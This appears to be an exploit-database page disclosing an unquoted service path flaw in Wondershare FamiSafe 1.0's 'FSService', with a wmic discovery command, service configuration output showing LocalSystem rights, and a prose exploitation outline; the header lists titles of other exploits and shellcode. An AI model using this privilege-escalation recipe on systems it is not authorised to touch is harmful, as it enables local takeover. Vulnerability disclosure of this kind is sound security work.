f2d7e05ad0
17 changes to exploits/shellcodes Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path TOSHIBA DVD PLAYER Navi Support Service - 'TNaviSrv' Unquoted Service Path Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation WordPress Plugin dzs-zoomsounds 6.60 - Remote Code Execution (RCE) (Unauthenticated) Hotel Druid 3.0.3 - Remote Code Execution (RCE) Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS) Solaris/SPARC - setuid(0) + chmod (/bin/ksh) + exit(0) Shellcode Solaris/SPARC - chmod(./me) Shellcode Solaris/SPARC - setuid(0) + execve (/bin/ksh) Shellcode Linux/MIPS - N32 MSB Reverse Shell Shellcode
35 lines
No EOL
1.4 KiB
Text
35 lines
No EOL
1.4 KiB
Text
# Exploit Title: Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path
|
|
# Discovery by: Luis Martinez
|
|
# Discovery Date: 2022-02-17
|
|
# Vendor Homepage: https://www.wondershare.com/
|
|
# Software Link : https://download-es.wondershare.com/famisafe_full7869.exe
|
|
# Tested Version: 1.0
|
|
# Vulnerability Type: Unquoted Service Path
|
|
# Tested on OS: Windows 10 Pro x64 es
|
|
|
|
# Step to discover Unquoted Service Path:
|
|
|
|
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "FSService" | findstr /i /v """
|
|
|
|
FSService FSService C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe Auto
|
|
|
|
|
|
# Service info:
|
|
|
|
C:\>sc qc FSService
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME: FSService
|
|
TYPE : 10 WIN32_OWN_PROCESS
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : FSService
|
|
DEPENDENCIES :
|
|
SERVICE_START_NAME : LocalSystem
|
|
|
|
#Exploit:
|
|
|
|
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. |